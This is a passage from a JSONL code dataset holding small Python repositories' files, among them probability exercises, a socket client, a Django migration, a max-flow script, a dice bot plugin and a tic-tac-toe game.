flats:\n existing=find_flat(cursor,flat.get('BUILDING'),flat.get('FLAT_NUMBER'))\n if existing is None :\n Helper.insert_dict(cursor,'FLAT',flat)\n else:\n id=existing.get(\"ID\")\n Helper.update_dict_by_id(cursor,'FLAT',flat,id)\n db.commit()","repo_name":"GrandViewTech/PyWebApp","sub_path":"src/BuildingService.py","file_name":"BuildingService.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25284394861","text":"from math import factorial\nfrom math import exp\n\ndef combination (n , k):\n return int(factorial(n) / (factorial(k) * 
factorial(n - k)))\n\n# 1.Вероятность того, что стрелок попадет в мишень, выстрелив один раз, равна 0.8. Стрелок выстрелил 100 раз.\n# Найдите вероятность того, что стрелок попадет в цель ровно 85 раз\n\nn = 100 # число испытания\nk = 85 # число наступлений события\np = 0.8 # вероятноять наступления события\nq = 1 - p # обратная вероятность\n\nprobability = combination(n, k) * p**k * q**(n-k)\nprint(f'Вероятность того, что стрелок попадет в цель ровно 85 раз: {round(probability * 100, 3)} %')\nprint()\n\n# 2. Вероятность того, что лампочка перегорит в течение первого дня эксплуатации, равна 0.0004.\n# В жилом комплексе после ремонта в один день включили 5000 новых лампочек.\n# Какова вероятность, что ни одна из них не перегорит в первый день? Какова вероятность, что перегорят ровно две?\n\nn = 5000\np = 0.0004\nlambda1 = n * p\n\nm = 0\nprobability0 = ((lambda1**m) / factorial(m)) * exp(-lambda1)\nprint(f'Вероятность того, что ни одна из лампочек не перегорит в первый день: {round(probability0 * 100, 3)} %')\n\nm = 2\nprobability2 = ((lambda1**m) / factorial(m)) * exp(-lambda1)\nprint(f'Вероятность того, что перегорят ровно две лампочки: {round(probability2 * 100, 3)} %')\nprint()\n\n# 3. Монету подбросили 144 раза. Какова вероятность, что орел выпадет ровно 70 раз?\nn = 144 # число испытания\nk = 70 # число наступлений события\np = 0.5 # вероятноять наступления события\nq = 1 - p # обратная вероятность\n\nprobability = combination(n, k) * p**k * q**(n-k)\nprint(f'Вероятность того, что орел выпадет ровно 70 раз: {round(probability * 100, 3)} %')\nprint()\n\n# 4. В первом ящике находится 10 мячей, из которых 7 - белые. Во втором ящике - 11 мячей, из которых 9 белых.\n# Из каждого ящика вытаскивают случайным образом по два мяча. Какова вероятность того, что все мячи белые?\n# Какова вероятность того, что ровно два мяча белые? 
Какова вероятность того, что хотя бы один мяч белый?\n\n# вероятность того, что все мячи белые: надо из первого ящика вытащить оба белых мяча и из второго ящика тоже оба белых мяча\n# для первого ящика\ncombination_white2_box1 = combination(7, 2) # вариантов вытянуть 2 белых мяча из 7 возможных\ncombination_all_box1 = combination(10, 2) # всего вариантов вытянуть 2 мяча из 10\n\nprobability_white2_box1 = combination_white2_box1 / combination_all_box1\nprint(f'Вероятность вытащить из первого ящика оба белых мяча: {round(probability_white2_box1 * 100, 3)} %')\n\n# для второрго ящика\ncombination_white2_box2 = combination(9, 2) # вариантов вытянуть 2 белых мяча из 9 возможных\ncombination_all_box2 = combination(11, 2) # всего вариантов вытянуть 2 мяча из 11\n\nprobability_white2_box2 = combination_white2_box2 / combination_all_box2\nprint(f'Вероятность вытащить из второго ящика оба белых мяча: {round(probability_white2_box2 * 100, 3)} %')\n\nprint(f'Общая вероятность вытащить все белые мячи: {round(probability_white2_box1 * probability_white2_box2 * 100, 3)} %')\n\n#вероятность того, что ровно два мяча белые:\n# подойдут ситуации когда:\n\n# из первого ящика взяли 2 белых мяча и из второго 0\n# вероятность первого ящика нам уже известна по расчётам ранее\nprint(f'Вероятность вытащить из первого ящика оба белых мяча: {round(probability_white2_box1 * 100, 3)} %')\n# 0 белых из второго ящика, т.е оба чёрные\ncombination_white0_box2 = combination(2, 2) # вариантов вытянуть 2 чёрных мяча из 2 возможных\nprobability_white0_box2 = combination_white0_box2 / combination_all_box2\nprint(f'Вероятность вытащить из второго ящика ни одного белого мяча: {round(probability_white0_box2 * 100, 3)} %')\n# или\n# из первого ящика 1 белый и из второго ящика 1 белый\n# для первого ящика\ncombination_white1_box1 = combination(7, 1) # вариантов вытянуть 1 белый мяч из 7 возможных\ncombination_black1_box1 = combination(3, 1) # вариантов вытянуть 1 чёрный мяч из 3 возможных\n# для второрго ящика\ncombination_white1_box2 = combination(9, 1) # вариантов вытянуть 1 белый мяч из 9 возможных\ncombination_black1_box2 = combination(2, 1) # вариантов вытянуть 1 чёрный мяч из 2 возможных\n\nprobability_white1_box1 = (combination_white1_box1 * combination_black1_box1)/ combination_all_box1\nprint(f'Вероятность вытащить из первого ящика 1 белый мяч: {round(probability_white1_box1 * 100, 3)} %')\n\nprobability_white1_box2 = (combination_white1_box2 * combination_black1_box2) / combination_all_box2\nprint(f'Вероятность вытащить из второго ящика 1 белый мяч: {round(probability_white1_box2 * 100, 3)} %')\n# или\n# из первого ящика взяли 0 белых мячей (2 чёрных) и из второго 2\ncombination_white0_box1 = combination(3, 2) # вариантов вытянуть 2 чёрных мяча из 3 возможных\nprobability_white0_box1 = combination_white0_box1 / combination_all_box1\nprint(f'Вероятность вытащить из первого ящика ни одного белого мяча: {round(probability_white0_box1 * 100, 3)} %')\n# вероятность вытащить из второго ящика 2 белых мяча нам уже известна по расчётам ранее\nprint(f'Вероятность вытащить из второго ящика оба белых мяча: {round(probability_white2_box2 * 100, 3)} %')\n\nprint(f'Вероятность того, что ровно два мяча белые: { round((probability_white2_box1 * probability_white0_box2 + probability_white1_box1 * probability_white1_box2 + probability_white0_box1 * probability_white2_box2) * 100, 3)} %')\n\n# вероятность того, что хотя бы один мяч белый\n# 1 в первом и 0 во втором или 1 в первом и 1 во втором или 1 в первом и 2 во втором или 2 в первом и 0 
во втором или 2 в первом и 1 во втором или 2 в первом и 2 во втором или 0 в первом и 1 во втором или 0 в первом и 2 во втором\nprint(f'Вероятность того, что хотя бы один мяч белый: {round((probability_white1_box1 * probability_white0_box2 + probability_white1_box1 * probability_white1_box2 + probability_white1_box1 * probability_white2_box2 + probability_white2_box1 * probability_white0_box2 + probability_white2_box1 * probability_white1_box2 + probability_white2_box1 * probability_white2_box2 + probability_white0_box1 * probability_white1_box2 + probability_white0_box1 * probability_white2_box2) * 100, 3)} %')","repo_name":"DemiurgXXX/DemiurgProbabilityTheory","sub_path":"lesson_2.py","file_name":"lesson_2.py","file_ext":"py","file_size_in_byte":8903,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"10530339227","text":"from AI_model import *\n\nonnx_path = \"models/onnx/version-RFB-320.onnx\"\n\nsession, input_name = set_session( onnx_path )\n\nrepresentations = get_representation( get_db_images(0, \"./itzy\"), \"Facenet\", enforce_detection = False )\n\n#cap = cv2.VideoCapture(\"./ITZY_ICY.mp4\") # capture from video file\ncap = cv2.VideoCapture(0) # capture from camera\n\nthreshold = 0.7\n\nwhile True:\n ret, orig_image = cap.read()\n\n if ret:\n image = get_preprocess_image( orig_image , (320,240) )\n\n confidences, boxes = session.run(None, {input_name: image})\n\n boxes, labels, probs = get_face_area(orig_image.shape[1], orig_image.shape[0], confidences, boxes, threshold)\n\n ns = []\n\n for box in boxes:\n try :\n face = orig_image[ box[1]-30: box[3]+30 , box[0]-20: box[2]+20 ]\n\n cv2.rectangle(orig_image, (box[0], box[1]), (box[2], box[3]), (255, 255, 0), 4)\n\n name = face_recognition(face, representations)\n \n orig_image = cv2.putText(orig_image, name, (box[0], box[1]) , cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0), 2)\n\n ns.append( name )\n except Exception as e:\n print(e)\n\n cv2.imshow('annotated', orig_image)\n if cv2.waitKey(int(1000/30)) & 0xFF == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"AmYongg/AI_server","sub_path":"Router/ai_model/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"36859795607","text":"# Exemplo basico socket (lado ativo)\n\nimport socket\n\nHOST = 'localhost' \nPORTA = 5000 \n\nsock = socket.socket() \n\nsock.connect((HOST, PORTA)) \n\nmsg = \"\"\nwhile(1):\n print(\"Digite a mensagem a ser enviada: (ou 'exit' para finalizar)\")\n msg = input()\n if(msg==\"exit\"): break\n\n sock.send(bytes(msg,\"utf-8\"))\n resposta = sock.recv(1024) \n print(\"resposta: \",str(resposta, encoding='utf-8'))\n\n\nsock.close()","repo_name":"RenanIOliveira/SistemasDistribuidos-2021.1","sub_path":"Laboratório 1/ativo.py","file_name":"ativo.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"71985026337","text":"\"\"\"Outbound message representation.\"\"\"\n\nfrom typing import Union\n\nfrom .connections.models.connection_target import ConnectionTarget\n\n\nclass OutboundMessage:\n \"\"\"Represents an outgoing message.\"\"\"\n\n def __init__(\n self,\n payload: Union[str, bytes],\n *,\n connection_id: str = None,\n encoded: bool = False,\n endpoint: str = None,\n reply_socket_id: str = None,\n reply_thread_id: str = None,\n reply_to_verkey: str = None,\n target: 
ConnectionTarget = None,\n ):\n \"\"\"Initialize an outgoing message.\"\"\"\n self.connection_id = connection_id\n self.encoded = encoded\n self._endpoint = endpoint\n self.payload = payload\n self.reply_socket_id = reply_socket_id\n self.reply_thread_id = reply_thread_id\n self.reply_to_verkey = reply_to_verkey\n self.target = target\n\n @property\n def endpoint(self) -> str:\n \"\"\"Return the endpoint of the outbound message.\n\n Defaults to the endpoint of the connection target.\n \"\"\"\n return self._endpoint or (self.target and self.target.endpoint)\n\n @endpoint.setter\n def endpoint(self, endp: str) -> None:\n \"\"\"Set the endpoint of the outbound message.\"\"\"\n self._endpoint = endp\n\n def __repr__(self) -> str:\n \"\"\"\n Return a human readable representation of this class.\n\n Returns:\n A human readable string for this class\n\n \"\"\"\n items = (\"{}={}\".format(k, repr(v)) for k, v in self.__dict__.items())\n return \"<{}({})>\".format(self.__class__.__name__, \", \".join(items))\n","repo_name":"OpenMined/PyAriesFL","sub_path":"aries_cloudagent/messaging/outbound_message.py","file_name":"outbound_message.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"34"} +{"seq_id":"2457514727","text":"# import modules \nimport os \nimport csv \n\n# variables\nmonths = 0\nnet_amount = 0\nprev_month= 0\ncurrent_month = 0\naverage_change = 0\nrevenue_change = 0\ngreatest_increase = 0\ngreatest_decrease = 0\ngreatest_increase_month = \"\"\ngreatest_decrease_month = \"\"\n\n\n# set path for file .csv file\ncsvpath = os.path.join('Resources','budget_data.csv')\n\n# open the .csv \nwith open(csvpath, newline='') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',')\n\n # read the header row first \n csv_header = next(csvreader)\n print(f\"Header: {csv_header}\")\n\n #start loop\n for row in csvreader:\n\n # calculate total month in dataset (use += to add the next row)\n months += 1\n \n # calculate net amount or revenue (row[1] sum of loss and profits)\n net_amount = net_amount + int(row[1])\n\n # set revenue = profit - previous months profit where previous month profit starts at 0 \n revenue = int(row[1]) - prev_month\n \n # calculate net change in revenue\n if months != 1:\n revenue_change = revenue_change + revenue\n \n # calculation for greatest revenue increase - use row[0] to get exact date.\n if (revenue > greatest_increase):\n greatest_increase = revenue\n greatest_increase_month = row[0]\n\n # calculation for greatest revenue decrease - use row[0] to get exact date.\n elif (revenue < greatest_decrease):\n greatest_decrease = revenue\n greatest_decrease_month = row[0]\n \n #set previous month profit to current before the start of new loop\n prev_month = int(row[1])\n\n #calculate average change \n average_change = revenue_change / (months - 1)\n\n #print financial analysis \n print(\"Financial Analysis\")\n print(\"-------------------------------------------------\")\n print(f\"Total Months: {months}\")\n print(f\"Total: ${net_amount}\")\n print(f\"Average Change: ${round(average_change,2)}\")\n print(f\"Greatest Increase in Profits: {greatest_increase_month} (${greatest_increase})\")\n print(f\"Greatest Decrease in Profits: {greatest_decrease_month} (${greatest_decrease})\") \n \n#export file to .txt \nanalysis_file = os.path.join('analysis', 'analysis.txt')\nwith open(analysis_file, \"w\") as output:\n output.write(\"Financial Analysis\\n\")\n 
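# The writes below mirror the console report above line for line;\n # contextlib.redirect_stdout could produce the same file, but explicit\n # writes keep the script easy to follow.\n 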
output.write(\"-------------------------------------------------\\n\")\n output.write(f\"Total Months: {months}\\n\")\n output.write(f\"Total: ${net_amount}\\n\")\n output.write(f\"Average Change: ${round(average_change,2)}\\n\")\n output.write(f\"Greatest Increase in Profits: {greatest_increase_month} (${greatest_increase})\\n\")\n output.write(f\"Greatest Decrease in Profits: {greatest_decrease_month} (${greatest_decrease})\\n\") \n\n","repo_name":"kennywf/python-challenge","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23488669089","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport uuid\nimport Hindlebook.models.validators\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Author',\n fields=[\n ('about', models.CharField(default='', blank=True, max_length=250)),\n ('uuid', models.CharField(default=uuid.uuid4, blank=True, serialize=False, primary_key=True, validators=[Hindlebook.models.validators.UuidValidator()], max_length=40)),\n ('username', models.CharField(max_length=30, verbose_name='username')),\n ('github_id', models.CharField(default='', blank=True, max_length=30)),\n ('avatar', models.ImageField(upload_to='', default='default_avatar.jpg', blank=True)),\n ('date_added', models.DateTimeField(auto_now_add=True)),\n ('follows', models.ManyToManyField(blank=True, db_index=True, to='Hindlebook.Author', related_name='followed_by')),\n ('friends', models.ManyToManyField(blank=True, db_index=True, to='Hindlebook.Author', related_name='friends_of')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Category',\n fields=[\n ('tag', models.CharField(max_length=15, serialize=False, primary_key=True)),\n ],\n options={\n 'verbose_name_plural': 'Tags',\n 'ordering': ['tag'],\n 'verbose_name': 'Tags',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Comment',\n fields=[\n ('guid', models.CharField(default=uuid.uuid4, blank=True, serialize=False, primary_key=True, validators=[Hindlebook.models.validators.UuidValidator()], max_length=40)),\n ('comment', models.CharField(max_length=2048)),\n ('pubDate', models.DateTimeField(auto_now_add=True, db_index=True, verbose_name='date published')),\n ('author', models.ForeignKey(related_name='comments', to='Hindlebook.Author')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Image',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('image', models.ImageField(upload_to='')),\n ('date_added', models.DateTimeField(auto_now_add=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Node',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('host', models.CharField(unique=True, max_length=100, help_text='URL of the host. ex. http://hindlebook.tamarabyte.com ')),\n ('host_name', models.CharField(default='', blank=True, max_length=50, help_text='Username/short identifier of host. ex. 
hindlebook', verbose_name='username')),\n ('is_connected', models.BooleanField(default=False, help_text='Whether or not we actively pull posts/authors from this node.', verbose_name='connect_with')),\n ('share_posts', models.BooleanField(default=True)),\n ('share_images', models.BooleanField(default=True)),\n ('require_auth', models.BooleanField(default=True)),\n ('password', models.CharField(default='', blank=True, max_length=128, help_text='Password this node connects to us with.')),\n ('our_username', models.CharField(default='', blank=True, max_length=128, help_text='Username this node wants from us.', verbose_name='username')),\n ('our_password', models.CharField(default='', blank=True, max_length=128, help_text='Password this node wants from us.', verbose_name='password')),\n ('team_number', models.IntegerField(default=9)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Post',\n fields=[\n ('guid', models.CharField(default=uuid.uuid4, blank=True, serialize=False, primary_key=True, validators=[Hindlebook.models.validators.UuidValidator()], max_length=40)),\n ('source', models.CharField(default='', blank=True, max_length=100)),\n ('origin', models.CharField(default='', blank=True, max_length=100)),\n ('title', models.CharField(default='', max_length=40)),\n ('description', models.CharField(default='', blank=True, max_length=40)),\n ('content', models.TextField()),\n ('pubDate', models.DateTimeField(auto_now_add=True, db_index=True, verbose_name='date published')),\n ('content_type', models.CharField(choices=[('text/plain', 'Text'), ('text/x-markdown', 'Markdown'), ('text/html', 'HTML')], default='text/plain', blank=True, max_length=15)),\n ('visibility', models.CharField(choices=[('PUBLIC', 'Public'), ('FOAF', 'Friends of Friends Only'), ('FRIENDS', 'Friends Only'), ('PRIVATE', 'Private'), ('SERVERONLY', 'Server Only')], default='PUBLIC', max_length=10, db_index=True)),\n ('author', models.ForeignKey(related_name='posts', to='Hindlebook.Author')),\n ('categories', models.ManyToManyField(blank=True, to='Hindlebook.Category', related_name='tagged_posts')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Settings',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('connection_limit', models.IntegerField(default=10, blank=True)),\n ('node', models.ForeignKey(default=1, to='Hindlebook.Node', null=True)),\n ],\n options={\n 'verbose_name_plural': 'Settings',\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='image',\n name='attached_to',\n field=models.ForeignKey(to='Hindlebook.Post'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='comment',\n name='post',\n field=models.ForeignKey(related_name='comments', to='Hindlebook.Post'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='author',\n name='node',\n field=models.ForeignKey(related_name='authors', to='Hindlebook.Node'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='author',\n name='user',\n field=models.OneToOneField(related_name='author', blank=True, help_text='Set for local authors only', to=settings.AUTH_USER_MODEL, null=True),\n preserve_default=True,\n ),\n 
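# No explicit operations are needed for the reverse accessors\n # (followed_by, friends_of, comments, posts, authors): Django derives\n # them from the related_name arguments above.\n 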
]\n","repo_name":"tamara-bain/cmput410-project","sub_path":"DistributedSocialNetworking/Hindlebook/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":7352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43417547670","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Feb 2 10:34:34 2023\r\n\r\n@author: Jonab, Shatha, Dhuha, Faizah\r\n\"\"\"\r\n\r\n#______________________Algo\"Edmonds-KARP\"_&_2D Array and stack_______________________\r\n\r\nimport time \r\n\r\ndef bfs(C, F, s, t):\r\n stack = [s]\r\n paths={s:[]}\r\n if s == t:\r\n return paths[s]\r\n while(stack):\r\n u = stack.pop()\r\n for v in range(len(C)):\r\n if(C[u][v]-F[u][v]>0) and v not in paths:\r\n paths[v] = paths[u]+[(u,v)]\r\n if v == t:\r\n return paths[v]\r\n stack.append(v)\r\n return None\r\n\r\ndef maxFlow(C, s, t):\r\n n = len(C) # C is the capacity matrix\r\n F = [[0] * n for i in range(n)]\r\n path = bfs(C, F, s, t)\r\n while path != None:\r\n flow = min(C[u][v] - F[u][v] for u,v in path)\r\n for u,v in path:\r\n F[u][v] += flow\r\n F[v][u] -= flow\r\n path = bfs(C,F,s,t)\r\n return sum(F[s][i] for i in range(n))\r\n\r\n #colom3 wight \r\ndatafile=open(\"Algo_Edmonds_KARP_DATA.txt\", \"r\") \r\nw=datafile.read().split()[2::3]\r\n\r\n\r\nfor i in range(0,len(w)):\r\n \r\n w[i]=float(w[i]) \r\n\r\n# wieht in 2d matrix\r\ndef convert_1d_to_2d(l, cols):\r\n return [l[i:i + cols] for i in range(0, len(l), cols)]\r\n\r\nC=convert_1d_to_2d(w, 353)\r\n\r\nC.pop(353)\r\nsource = 1 # A\r\nsink = 200 # F\r\nstart = time.process_time() \r\nmaxVal = maxFlow(C, source, sink)\r\nprint(\"max_flow_value is: \", maxVal)\r\nprint(time.process_time()-start)","repo_name":"Jonab2oo1/Algorithm-Project","sub_path":"2D Array & Stack_Edmonds_Karp.py","file_name":"2D Array & Stack_Edmonds_Karp.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"29060323613","text":"import string\n\nwith open('day_6/input.txt', 'r') as f:\n dirty_data = f.read().split('\\n\\n')\n dirty_data = [word.replace('\\n', '') for word in dirty_data]\n\ndataset = dict.fromkeys(string.ascii_lowercase, 0)\ntotal_valid = 0\n\nfor everyline in dirty_data: \n for ch in everyline: \n if dataset[ch] == 0:\n dataset[ch] = 1\n \n valid_answer_count = sum(value == 1 for value in dataset.values())\n total_valid += valid_answer_count\n dataset = dict.fromkeys(string.ascii_lowercase, 0)\n\nprint(f'\\nTotal valid answers: {total_valid}')\n\n\n","repo_name":"SpawnTerror/AdventOfCode-2020","sub_path":"day_6/day6_part1.py","file_name":"day6_part1.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74981538338","text":"def gcd(a, b):\n while (b > 0):\n a, b = b, a % b\n \n return a\n\ndef extgcd(a, b):\n # Return in x and y form a*x + b*y\n # x is the inverse of a\n # y is the inverse if b\n # There is only an inverse if gcd(a,b) == 1\n if a == 0:\n return (0, 1)\n else:\n x, y = extgcd(b % a, a)\n x1 = y - (b // a) * x\n y1 = x\n return (x1, y1)\n\ndef moduloInverseOf(a, b):\n inv = extgcd(a, b)\n return inv[0] % b\n\nif __name__ == \"__main__\":\n \n numberList = [0, 1, 2, 3, 4 ,5]\n b = 5\n\n for a in numberList:\n resultGCD = gcd(a,b)\n\n inverse = \"No Inverse\"\n if resultGCD == 1:\n inverse = moduloInverseOf(a, b)\n\n print(\"Greatest Common Divisor: \", 
resultGCD)\n print(\"Inverse of \" + str(a) + \" mod \" + str(b) + \" is: \", inverse)\n print(\"------------------------------\")","repo_name":"FasterCoding/Greatest-Common-Divisor","sub_path":"python/euclid.py","file_name":"euclid.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8813691517","text":"# -*-coding:utf-8 -*-\nimport xmpp, time, re, random\nfrom ritsu_api import *\n\ndrexp = re.compile(r'^(\\d+)([DdUuZzWw])(\\d+)(?:([HhLlEeFf\\+\\-\\*\\/])(\\d+))?$')\n\ndef command_dice(bot, room, nick, access_level, parameters, message):\n if not parameters:\n return u'Ты выиграл!'\n dice_strs = map(lambda x: x.strip(), parameters.split(';'))\n if len(dice_strs) > 10:\n return u'Дохуя кубиков за раз!'\n return u'\\n'.join(map(run_dice, dice_strs))\n\ndef run_dice(dice_str):\n result = ''\n m = drexp.match(dice_str)\n if m:\n count = int(m.group(1))\n die_type = m.group(2)\n die_sides = int(m.group(3))\n operator = m.group(4)\n operator_arg = m.group(5)\n if operator_arg:\n operator_arg = int(operator_arg)\n if count > 100 or die_sides > 1000 or (operator and operator_arg > 1000):\n return u'Дохуя'\n if (die_sides == 0) or ((die_type == 'w' or die_type == 'W') and (die_sides < 2)):\n return u'Охуел?'\n dice_runs = dice(count, die_type, die_sides)\n result += u'(' + u', '.join(map(str, dice_runs)) + u')'\n if not operator:\n result += u' = %d' % sum(dice_runs)\n elif operator == '+':\n result += u' + %d = %d' % (operator_arg, sum(dice_runs) + operator_arg)\n elif operator == '-':\n result += u' - %d = %d' % (operator_arg, sum(dice_runs) - operator_arg)\n elif operator == '*':\n result += u' * %d = %d' % (operator_arg, sum(dice_runs) * operator_arg)\n elif operator == '/':\n result += u' / %d = %d' % (operator_arg, sum(dice_runs) / operator_arg)\n elif operator == 'H' or operator == 'h':\n sorted_runs = sorted(dice_runs)\n vals = sorted_runs[-operator_arg:]\n result += u' макс (' + u', '.join(map(str, vals)) + (u') = %d' % sum(vals))\n elif operator == 'L' or operator == 'l':\n sorted_runs = sorted(dice_runs)\n vals = sorted_runs[0:operator_arg]\n result += u' мин (' + u', '.join(map(str, vals)) + (u') = %d' % sum(vals))\n elif operator == 'E' or operator == 'e':\n vals = map(lambda x: 1 if x >= operator_arg else 0, dice_runs)\n vals_str = map(lambda x: u'Успех' if x == 1 else u'Фейл', vals)\n result += u' успехи (' + u', '.join(vals_str) + (u') = %d' % sum(vals))\n elif operator == 'F' or operator == 'f':\n vals = map(lambda x: 1 if x >= operator_arg else -1, dice_runs)\n vals_str = map(lambda x: u'Успех' if x == 1 else u'Фейл', vals)\n result += u' успехи минус фейлы (' + u', '.join(vals_str) + (u') = %d' % sum(vals))\n return result\n else:\n return u\"Обосрался ты, брат, с '%s'\" % dice_str\n\ndef die(typ, sides):\n if typ == 'D' or typ == 'd':\n return [random.randint(1,sides)]\n elif typ == 'Z' or typ == 'z':\n return [random.randint(0,sides-1)]\n elif typ == 'U' or typ == 'u':\n return [random.randint(-sides,sides)]\n elif typ == 'W' or typ == 'w':\n r = []\n d = die('d', sides)\n while d == [sides]:\n r += d\n d = die('d', sides)\n r += d\n return r\n\ndef dice(num, typ, sides):\n # Гвидо, я твою мать ебал\n r = []\n for i in range(num):\n r += die(typ, sides)\n return r\n\ndef load(bot):\n random.seed()\n bot.add_command('dice', command_dice, LEVEL_GUEST, 'dice')\n bot.add_command(u'к', command_dice, LEVEL_GUEST, 'dice')\n bot.add_command(u'куб', command_dice, LEVEL_GUEST, 
'dice')\n\ndef unload(bot):\n pass\n\ndef info(bot):\n return 'Dice plugin v1.0.1'\n\n","repo_name":"ridouchire/RitsuBot","sub_path":"plugin_command_dice.py","file_name":"plugin_command_dice.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"3173520098","text":"import pygame\nimport sys\nimport time\n\nimport tictactoe as ttt\n\npygame.init()\nsize = width, height = 600, 400\n\n# Colors\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\n\nscreen = pygame.display.set_mode(size)\n\nmediumFont = pygame.font.Font(\"OpenSans-Regular.ttf\", 28)\nlargeFont = pygame.font.Font(\"OpenSans-Regular.ttf\", 40)\nmoveFont = pygame.font.Font(\"OpenSans-Regular.ttf\", 60)\n\nuser = None\nboard = ttt.initial_state()\nai_turn = False\n\nwhile True:\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n\n screen.fill(black)\n\n # Let user choose a player.\n if user is None:\n\n # Draw title\n title = largeFont.render(\"Play Tic-Tac-Toe\", True, white)\n titleRect = title.get_rect()\n titleRect.center = ((width / 2), 50)\n screen.blit(title, titleRect)\n\n # Draw buttons\n playXButton = pygame.Rect((width / 8), (height / 2), width / 4, 50)\n playX = mediumFont.render(\"Play as X\", True, black)\n playXRect = playX.get_rect()\n playXRect.center = playXButton.center\n pygame.draw.rect(screen, white, playXButton)\n screen.blit(playX, playXRect)\n\n playOButton = pygame.Rect(5 * (width / 8), (height / 2), width / 4, 50)\n playO = mediumFont.render(\"Play as O\", True, black)\n playORect = playO.get_rect()\n playORect.center = playOButton.center\n pygame.draw.rect(screen, white, playOButton)\n screen.blit(playO, playORect)\n\n # Check if button is clicked\n click, _, _ = pygame.mouse.get_pressed()\n if click == 1:\n mouse = pygame.mouse.get_pos()\n if playXButton.collidepoint(mouse):\n time.sleep(0.2)\n user = ttt.X\n elif playOButton.collidepoint(mouse):\n time.sleep(0.2)\n user = ttt.O\n\n else:\n\n # Draw game board\n tile_size = 80\n tile_origin = (width / 2 - (1.5 * tile_size),\n height / 2 - (1.5 * tile_size))\n tiles = []\n for i in range(3):\n row = []\n for j in range(3):\n rect = pygame.Rect(\n tile_origin[0] + j * tile_size,\n tile_origin[1] + i * tile_size,\n tile_size, tile_size\n )\n pygame.draw.rect(screen, white, rect, 3)\n\n if board[i][j] != ttt.EMPTY:\n move = moveFont.render(board[i][j], True, white)\n moveRect = move.get_rect()\n moveRect.center = rect.center\n screen.blit(move, moveRect)\n row.append(rect)\n tiles.append(row)\n\n game_over = ttt.terminal(board)\n player = ttt.player(board)\n\n # Show title\n if game_over:\n winner = ttt.winner(board)\n if winner is None:\n title = f\"Game Over: Tie.\"\n else:\n title = f\"Game Over: {winner} wins.\"\n elif user == player:\n title = f\"Play as {user}\"\n else:\n title = f\"Computer thinking...\"\n title = largeFont.render(title, True, white)\n titleRect = title.get_rect()\n titleRect.center = ((width / 2), 30)\n screen.blit(title, titleRect)\n\n # Check for AI move\n if user != player and not game_over:\n if ai_turn:\n time.sleep(0.5)\n move = ttt.minimax(board)\n board = ttt.result(board, move)\n ai_turn = False\n else:\n ai_turn = True\n\n # Check for a user move\n click, _, _ = pygame.mouse.get_pressed()\n if click == 1 and user == player and not game_over:\n mouse = pygame.mouse.get_pos()\n for i in range(3):\n for j in range(3):\n if (board[i][j] == ttt.EMPTY and tiles[i][j].collidepoint(mouse)):\n board = 
